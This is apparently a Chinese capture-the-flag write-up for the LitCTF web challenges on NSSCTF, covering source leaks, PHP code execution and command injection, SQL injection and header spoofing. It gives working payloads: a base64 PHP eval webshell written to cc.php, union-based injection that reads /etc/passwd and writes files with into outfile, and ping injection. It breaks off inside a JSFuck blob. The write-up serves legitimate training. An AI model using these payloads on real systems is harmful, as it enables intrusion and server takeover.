4.LiCTF NSSCTF WEB方向部分 WriteUp

news2024/11/27 15:53:01

在这里插入图片描述

文章目录

    • 0x01、我FLAG呢?【源码信息泄露+js信息泄露】
    • 0x02、导弹迷踪【js信息泄露】
    • 0x03、Follow me and hack me【hackbar+burp+备份文件】
    • 0x04、PHP是世界上最好的语言!!【代码执行 getshell】
    • 0x05、Vim yyds【命令执行 getshell】
    • 0x06、作业管理系统【创建文件 getshell】
    • 0x07、狠狠的注入【SQL注入 getshell】
    • 0x08、Http pro max plus【HTTP请求头】
    • 0x09、Ping【命令执行 getshell】
    • 0x0a、1zjs【js信息泄露】
    • 0x0b、彩蛋【1+3+6+7四题拼接的flag】

0x01、我FLAG呢?【源码信息泄露+js信息泄露】

源码有flag:<!--flag is here flag=NSSCTF{8f83d19f-09d7-43da-8ff7-9fdde5dbcac1} -->

彩蛋寻找:找到了一个空格flag.php文件

┌──(root㉿kali)-[~/dirsearch]
└─# python dirsearch.py -u http://node5.anna.nssctf.cn:28919/

|. _ _ _ _ _ | v0.4.3
(||| ) (/(|| (| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11710

Output: /root/dirsearch/reports/http_node5.anna.nssctf.cn_28919/__23-05-13_23-38-17.txt

Target: http://node5.anna.nssctf.cn:28919/

[23:38:17] Starting:
[23:38:55] 301 - 169B - /assets -> http://node5.anna.nssctf.cn/assets/
[23:38:55] 403 - 555B - /assets/
[23:39:16] 200 - 0B - /flag.php

Task Completed

页面源码,通过http://node6.anna.nssctf.cn:28980/assets/js/script.min.js,发现其内有:

Function.prototype.getMultiLine = function () {
    var lines = new String(this);
    lines = lines.substring(lines.indexOf("/*") + 3, lines.lastIndexOf("*/"));
    return lines;
  }
  var string = function () {
  
    /* 娆竳浠€涔堬紒浣犵湅鍒版垜浜嗕箞锛�
    
    鎭枩浣犲彂鐜颁簡褰╄泲鍝
    ______  __             _  _______   _______  _            _  __ ____          _ 
   |  ____|/_ |           | ||__   __| |__   __|| |          | |/ /|___ \        | |
   | |__    | | _ __  ___ | |_  | |  ___  | |   | |__    ___ | ' /   __) | _   _ | |
   |  __|   | || '__|/ __|| __| | | / _ \ | |   | '_ \  / _ \|  <   |__ < | | | || |
   | |      | || |   \__ \| |_  | || (_) || |   | | | ||  __/| . \  ___) || |_| ||_|
   |_|      |_||_|   |___/ \__| |_| \___/ |_|   |_| |_| \___||_|\_\|____/  \__, |(_)
                                                                            __/ |   
                                                                           |___/    
    try to run giveMeEgg() to get the egg!good luck~ 
    wink wink~
    */
  }

点击控制台,也显示了:

欸~什么!你看到我了么!
    
    恭喜你发现了彩蛋哦~
    ______  __             _  _______   _______  _            _  __ ____          _ 
   |  ____|/_ |           | ||__   __| |__   __|| |          | |/ /|___ \        | |
   | |__    | | _ __  ___ | |_  | |  ___  | |   | |__    ___ | ' /   __) | _   _ | |
   |  __|   | || '__|/ __|| __| | | / _ \ | |   | '_ \  / _ \|  <   |__ < | | | || |
   | |      | || |   \__ \| |_  | || (_) || |   | | | ||  __/| . \  ___) || |_| ||_|
   |_|      |_||_|   |___/ \__| |_| \___/ |_|   |_| |_| \___||_|\_\|____/  \__, |(_)
                                                                            __/ |   
                                                                           |___/    
    try to run giveMeEgg() to get the egg!good luck~ 
    wink wink~

控制台下运行:giveMeEgg()
giveMeEgg()
script.min.js:49 LitCTF{First_t0_The_k3y! (1/?)
script.min.js:50 多留意一下哦~ 说不定就找到下一个了呢~

得到第一个彩蛋:
LitCTF{First_t0_The_k3y! (1/?)

0x02、导弹迷踪【js信息泄露】

查看源码,找到一个js文件夹,http://node5.anna.nssctf.cn:28482/src/game.js

其内发现了:F|L|A|G {y0u_w1n_th1s_!!!}
text: function () {if (mLevel === 6) {return ‘GOT F|L|A|G {y0u_w1n_th1s_!!!}’;} else {return ‘CLICK TO CONTINUE’;}},

因此flag:F|L|A|G {y0u_w1n_th1s_!!!}
注意:提交的格式为NSSCTF{y0u_w1n_th1s_!!!}

0x03、Follow me and hack me【hackbar+burp+备份文件】

使用HackBar传入GET和POST数据,点击execute执行,同时Burp抓包,再发送获得flag:
NSSCTF{6ebfbb4f-856b-4941-adac-a20c85ce1d99}
POC:
POST /?CTF=Lit2023 HTTP/1.1
Host: node6.anna.nssctf.cn:28285
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: http://node6.anna.nssctf.cn:28285
Connection: close
Referer: http://node6.anna.nssctf.cn:28285/?CTF=Lit2023
Upgrade-Insecure-Requests: 1

Challenge=i%27m_c0m1ng

寻找彩蛋:0B的flag.php、还有一个www.zip
┌──(root㉿kali)-[~/dirsearch]
└─# python dirsearch.py -u node6.anna.nssctf.cn:28465

|. _ _ _ _ _ | v0.4.3
(||| ) (/(|| (| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11710

Output: /root/dirsearch/reports/_node6.anna.nssctf.cn_28465/_23-05-13_23-44-10.txt

Target: http://node6.anna.nssctf.cn:28465/

[23:44:10] Starting:
[23:45:11] 200 - 0B - /flag.php
[23:46:05] 200 - 881B - /www.zip

Task Completed

从www.zip中获取:
<?php // 第三个彩蛋!(看过头号玩家么?) // _R3ady_Pl4yer_000ne_ (3/?) ?>

0x04、PHP是世界上最好的语言!!【代码执行 getshell】

system(‘ls’);
system(‘pwd’);
system(‘find / -name flag*’);
system(‘cat /flag’);
//POWERFUL PHP TOOL
flag=NSSCTF{43fc5c29-e6b5-44f7-92d6-b2bef957a27c}

<?php eval($_POST[cc]);?>

PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==

echo “PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==” | base64 -d >cc.php

system(‘echo “PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==” | base64 -d >cc.php’);

蚁剑连接:http://node5.anna.nssctf.cn:28517/cc.php

system(‘find / -name flag*’);的结果:
/sys/devices/pnp0/00:04/tty/ttyS0/flags /sys/devices/platform/serial8250/tty/ttyS15/flags /sys/devices/platform/serial8250/tty/ttyS6/flags /sys/devices/platform/serial8250/tty/ttyS23/flags /sys/devices/platform/serial8250/tty/ttyS13/flags /sys/devices/platform/serial8250/tty/ttyS31/flags /sys/devices/platform/serial8250/tty/ttyS4/flags /sys/devices/platform/serial8250/tty/ttyS21/flags /sys/devices/platform/serial8250/tty/ttyS11/flags /sys/devices/platform/serial8250/tty/ttyS2/flags /sys/devices/platform/serial8250/tty/ttyS28/flags /sys/devices/platform/serial8250/tty/ttyS18/flags /sys/devices/platform/serial8250/tty/ttyS9/flags /sys/devices/platform/serial8250/tty/ttyS26/flags /sys/devices/platform/serial8250/tty/ttyS16/flags /sys/devices/platform/serial8250/tty/ttyS7/flags /sys/devices/platform/serial8250/tty/ttyS24/flags /sys/devices/platform/serial8250/tty/ttyS14/flags /sys/devices/platform/serial8250/tty/ttyS5/flags /sys/devices/platform/serial8250/tty/ttyS22/flags /sys/devices/platform/serial8250/tty/ttyS12/flags /sys/devices/platform/serial8250/tty/ttyS30/flags /sys/devices/platform/serial8250/tty/ttyS3/flags /sys/devices/platform/serial8250/tty/ttyS20/flags /sys/devices/platform/serial8250/tty/ttyS10/flags /sys/devices/platform/serial8250/tty/ttyS29/flags /sys/devices/platform/serial8250/tty/ttyS1/flags /sys/devices/platform/serial8250/tty/ttyS19/flags /sys/devices/platform/serial8250/tty/ttyS27/flags /sys/devices/platform/serial8250/tty/ttyS17/flags /sys/devices/platform/serial8250/tty/ttyS8/flags /sys/devices/platform/serial8250/tty/ttyS25/flags /sys/devices/virtual/net/eth0/flags /sys/devices/virtual/net/eth1/flags /sys/devices/virtual/net/lo/flags /proc/sys/kernel/sched_domain/cpu0/domain0/flags /proc/sys/kernel/sched_domain/cpu0/domain1/flags /proc/sys/kernel/sched_domain/cpu1/domain0/flags /proc/sys/kernel/sched_domain/cpu1/domain1/flags /proc/sys/kernel/sched_domain/cpu2/domain0/flags /proc/sys/kernel/sched_domain/cpu2/domain1/flags /proc/sys/kernel/sched_domain/cpu3/domain0/flags /proc/sys/kernel/sched_domain/cpu3/domain1/flags /proc/sys/kernel/sched_domain/cpu4/domain0/flags /proc/sys/kernel/sched_domain/cpu4/domain1/flags /proc/sys/kernel/sched_domain/cpu5/domain0/flags /proc/sys/kernel/sched_domain/cpu5/domain1/flags /proc/sys/kernel/sched_domain/cpu6/domain0/flags /proc/sys/kernel/sched_domain/cpu6/domain1/flags /proc/sys/kernel/sched_domain/cpu7/domain0/flags /proc/sys/kernel/sched_domain/cpu7/domain1/flags /flag

0x05、Vim yyds【命令执行 getshell】

访问:.index.php.swp
下载下来

恢复文件:
vim -r .index.php.swp
或者vi -r .index.php.swp

我们可以发现恢复的内容为:

<html>
<head>
    <meta charset="UTF-8">
    <style type="text/css">
        body,
        html {
            display: flex;
            align-items: center;
            justify-content: center;
        }

        div.vim {
            display: flex;
            align-content: center;
            vertical-align: middle;
            justify-content: center;
        }

        img {
            border: none;
            width: 8rem;
            height: auto;
        }

        h1.vim_yyds {
            color: #50f728;
            display: flex;
            align-items: flex-start;
            justify-content: center;
            margin-top: 50;
            margin-left: 5px;
        }

        h3.vim_said {
            color: #39c2ff;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        br,
        p {
            font-size: 20;
        }
    </style>
</head>

<body>
    <main>
        <div class="vim">
            <img src="https://www.bing.com/th?id=OSAAS.7B95FA2D97CE022F5E7949F60E350A25&pid=TechQna"></img>
            <h1 class="vim_yyds">
                Vim yyds
            </h1>
        </div>
        <h3 class="vim_said">
            队里师傅说Vim是世界上最好的编辑器,不接受反驳
        </h3>
        <div class="can_can_vim">
            <?php
            error_reporting(0);
            $password = "Give_Me_Your_Flag";
            echo "<p>can can need Vim </p>";
            if ($_POST['password'] === base64_encode($password)) {
                echo "<p>Oh You got my password!</p>";
                eval(system($_POST['cmd']));
            }
            ?>
        </div>
    </main>
</body>

关键点:

<?php
            error_reporting(0);
            $password = "Give_Me_Your_Flag";
            echo "<p>can can need Vim </p>";
            if ($_POST['password'] === base64_encode($password)) {
                echo "<p>Oh You got my password!</p>";
                eval(system($_POST['cmd']));
            }
            ?>

Give_Me_Your_Flag
base64编码:R2l2ZV9NZV9Zb3VyX0ZsYWc=
POST传入:
password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cat /flag
NSSCTF{1c21591c-7690-47ee-8426-54f79824f06d}

写入webshell:

<?php eval($_POST[cc]);?>

PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==

echo “PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==” | base64 -d >cc.php

password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=echo “PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==” | base64 -d >cc.php

蚁剑连接:http://node6.anna.nssctf.cn:28554/cc.php 密码为cc

0x06、作业管理系统【创建文件 getshell】

admin/admin登录
创建文件:cc.php

<?php eval($_POST['cc']);?>

蚁剑连接即可找到根目录的flag
flag=NSSCTF{959f0158-c22a-471b-8926-879171fae14c}

寻找彩蛋:
远程下载有个默认链接https://github.com/ProbiusOfficial/My_pic/blob/main/demo.jpg,访问发现第二个彩蛋
wow 你找到了第二个彩蛋哦~
_S0_ne3t? (2/?)

0x07、狠狠的注入【SQL注入 getshell】

?id=-1)))))) union select schema_name,2 from information_schema.schemata%23
Array ( [0] => Array ( [username] => information_schema [password] => 2 )
[1] => Array ( [username] => mysql [password] => 2 )
[2] => Array ( [username] => ctftraining [password] => 2 )
[3] => Array ( [username] => performance_schema [password] => 2 )
[4] => Array ( [username] => test [password] => 2 )
[5] => Array ( [username] => ctf [password] => 2 ) )

?id=-1)))))) union select database(),2%23
Array ( [0] => Array ( [username] => ctf [password] => 2 ) )

?id=-1)))))) union select group_concat(table_name),2 from information_schema.tables where table_schema=‘ctf’%23
//users

?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name=‘users’ and table_schema=‘ctf’%23
// id,username,password

?id=-1)))))) union select group_concat(id,0x7e,username,0x7e,password),2 from users%23
//1tanjiOHHHHHHH,2fake_flagF1rst_to_Th3_eggggggggg!}
//假的flag

?id=-1)))))) union select group_concat(table_name),2 from information_schema.tables where table_schema=‘ctftraining’%23
Array ( [0] => Array ( [username] => flag,news,users [password] => 2 ) )
// flag,news,users

?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name=‘flag’ and =‘ctftraining’%23
Array ( [0] => Array ( [username] => flag [password] => 2 ) )
//flag

?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name=‘news’ and table_schema=‘ctftraining’%23
//id,title,content,time

?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name=‘users’ and table_schema=‘ctftraining’%23
//id,username,password,ip,time

?id=-1)))))) union select group_concat(id,0x7e,title,0x7e,content,0x7e,time),2 from news where table_schema=‘ctftraining’%23
//0 results

?id=-1)))))) union select group_concat(id,0x7e,username,0x7e,password,0x7e,ip),2 from users where table_schema=‘ctftraining’%23
//0 results

?id=-1)))))) union select flag,2 from flag where table_schema=‘ctftraining’%23
//0 results

怎么会是空的呢????
可能是语句的问题,我们使用Sqlmap直接跑:
sqlmap -u http://node5.anna.nssctf.cn:28051/index.php?id=1 -D “ctftraining” -T flag -C flag --dump
//NSSCTF{b029dc6f-0160-4b1e-b2c1-4aeb301dc3e2}

经过测试,发现了table_schema只是内置库的字段,我们这里指定数据库查询应该用:库名.表名的形式
?id=-1)))))) union select flag,2 from ctftraining.flag%23
// NSSCTF{d999de63-d796-4151-b10e-c77cbc87ab64}

寻找彩蛋:
之前查到的假的flag,好像是最后一个彩蛋:
F1rst_to_Th3_eggggggggg!}

?id=-1)))))) union select load_file(‘/etc/passwd’),2%23
root❌0:0:root:/root:/bin/ash
bin❌1:1:bin:/bin:/sbin/nologin
daemon❌2:2:daemon:/sbin:/sbin/nologin
adm❌3:4:adm:/var/adm:/sbin/nologin
lp❌4:7:lp:/var/spool/lpd:/sbin/nologin
sync❌5:0:sync:/sbin:/bin/sync
shutdown❌6:0:shutdown:/sbin:/sbin/shutdown
halt❌7:0:halt:/sbin:/sbin/halt
mail❌8:12:mail:/var/mail:/sbin/nologin
news❌9:13:news:/usr/lib/news:/sbin/nologin
uucp❌10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator❌11:0:operator:/root:/sbin/nologin
man❌13:15👨/usr/man:/sbin/nologin
postmaster❌14:12:postmaster:/var/mail:/sbin/nologin
cron❌16:16:cron:/var/spool/cron:/sbin/nologin
ftp❌21:21::/var/lib/ftp:/sbin/nologin
sshd❌22:22:sshd:/dev/null:/sbin/nologin
at❌25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid❌31:31:Squid:/var/cache/squid:/sbin/nologin
xfs❌33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games❌35:35:games:/usr/games:/sbin/nologin
cyrus❌85:12::/usr/cyrus:/sbin/nologin
vpopmail❌89:89::/var/vpopmail:/sbin/nologin
ntp❌123:123:NTP:/var/empty:/sbin/nologin
smmsp❌209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest❌405💯guest:/dev/null:/sbin/nologin
nobody❌65534:65534:nobody:/:/sbin/nologin
www-data❌82:82:Linux User,:/home/www-data:/sbin/nologin
mysql❌100:101:mysql:/var/lib/mysql:/sbin/nologin
nginx❌101:102:nginx:/var/lib/nginx:/sbin/nologin

?id=-1)))))) union select load_file(‘/etc/nginx/nginx.conf’),2%23
Array ( [0] => Array ( [username] => daemon off; worker_processes auto; error_log /var/log/nginx/error.log warn; events { worker_connections 1024; } http { include /etc/nginx/mime.types; default_type application/octet-stream; sendfile on; keepalive_timeout 65; server { listen 80; server_name localhost; root /var/www/html; index index.php; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; location / { try_files $uri u r i / / i n d e x . p h p ? uri/ /index.php? uri//index.php?args; } location ~ .php$ { try_files $uri =404; fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; include fastcgi_params; fastcgi_param SCRIPT_FILENAME d o c u m e n t r o o t document_root documentrootfastcgi_script_name; } } } [password] => 2 ) )

?id=-1)))))) union select load_file(‘/var/www/html/index.php’),2%23

Array
(
    [0] => Array
        (
            [username] => <?php
    error_reporting(0);
  include "connect.php";
?>
<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
    <title>狠狠的注入涅~</title>
    <link rel="stylesheet" href="assets/bootstrap/css/bootstrap.min.css">
    <link rel="stylesheet"
        href="https://fonts.googleapis.com/css?family=Lato:300,400,700,300italic,400italic,700italic&amp;display=swap">
</head>

<body>
    <header class="text-center text-white masthead"
        style="background:url('https://www.dmoe.cc/random.php')no-repeat center center;background-size:cover;">
        <div class="overlay"></div>
        <div class="container">
            <div class="row">
                <div class="col-xl-9 mx-auto position-relative">
                    <h1 class="mb-5">Search what you want to search</h1>
                </div>
                <div class="col-md-10 col-lg-8 col-xl-7 mx-auto position-relative">
                    <form method="get" action="">
                        <div class="row">
                            <div class="col-12 col-md-9 mb-2 mb-md-0">
                                <input class="form-control form-control-lg" type="text" name="id"
                                    placeholder="Enter your id to start">
                            </div>
                            <div class="col-12 col-md-3">
                                <button class="btn btn-primary btn-lg" type="submit">姨妈大!</button>
                            </div>
                        </div>
                    </form>

                </div>
            </div>
        </div>
    </header>
    


<section class="text-center bg-light features-icons">
    <div class="container">
        <div class="row">
            <div class="col-md-6"> 
                <h5>Key Source</h5>
                <pre><?php highlight_file(source) ?></pre>
            </div>
            <div class="col-md-6"> 
                <?php
                
                $sql = "SELECT username,password FROM users WHERE id = ".'(((((('.$_GET["id"].'))))))';
                echo "<h5>Executed Operations:</h5>"
                    .$sql
                    ."<br><br>";
                $result = $conn->query($sql);
                if ($result->num_rows > 0) {
                        print_r(mysqli_fetch_all($result, MYSQLI_ASSOC));
                } else {
                    echo "0 results";
                }
                ?>
            </div>
        </div>
    </div>
</section>



    <section class="showcase">
        <div class="container-fluid p-0">
            <div class="row g-0"></div>
        </div>
    </section>
    <script src="assets/bootstrap/js/bootstrap.min.js"></script>
</body>

</html>



            [password] => 2
        )

)

?id=-1)))))) union select ‘<?php phpinfo();?>’,2 into outfile ‘/var/www/html/info.php’%23
http://node6.anna.nssctf.cn:28413/info.php

?id=-1)))))) union select ‘<?php eval($_POST["cc"]);?>’,2 into outfile ‘/var/www/html/cc.php’%23
http://node6.anna.nssctf.cn:28413/cc.php

0x08、Http pro max plus【HTTP请求头】

1、Burp抓包:添加和修改http请求头
User-Agent: Chrome
Client-IP: 127.0.0.1
Referer: pornhub.com
Via: Clash.win

返回的内容:借一步说话—>> /wtfwtfwtfwtf.php

2、POC如下所示:
GET / HTTP/1.1
Host: node5.anna.nssctf.cn:28402
User-Agent: Chrome
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Client-IP: 127.0.0.1
Referer: pornhub.com
Via: Clash.win

3、访问/wtfwtfwtfwtf.php页面
发现返回了如何让我们连外网,其实当前页面源码有东西

<!--你就冲吧,什么都冲只会害了你自己 bdy好康的在 /sejishikong.php-->

4、访问/sejishikong.php页面,得到flag
冲完啦?拿上你的flag赶紧走NSSCTF{78272e23-99df-46ec-9949-74abf0a971dd}

0x09、Ping【命令执行 getshell】

前端有限制,众所周知前端的限制只是为了前端用户可以输入有效的数据,让后端减小开销,更好的处理数据
因此,前端的限制是不安全的,这里BurpSuite抓包,发到重放模块:

command=127.0.0.1|whoami&ping=Ping
//返回www-data

command=127.0.0.x||find / -name flag*&ping=Ping
//返回:/flag

command=127.0.0.x||cat /flag&ping=Ping
//返回:flag=NSSCTF{e3c1168b-4204-4875-a84b-bacdca94b744}

写入webshell:

<?php eval($_POST[cc]);?>

PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==
echo “PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==” | base64 -d >cc.php

command=127.0.0.x||echo “PD9waHAgZXZhbCgkX1BPU1RbY2NdKTs/Pg==” | base64 -d >cc.php&ping=Ping

蚁剑连接:http://node6.anna.nssctf.cn:28236/cc.php 密码cc

0x0a、1zjs【js信息泄露】

源码后,查看用到了js文件http://node6.anna.nssctf.cn:28119/dist/index.umd.js

发现了注释:/f@k3f1ag.php
PERFORMANCE OF THIS SOFTWARE.Your gift just take it : /f@k3f1ag.php

访问:/f@k3f1ag.php

(+[![]]+[])[+[]]+(+[]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+[]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()(([]+[])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]())[!+[]+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+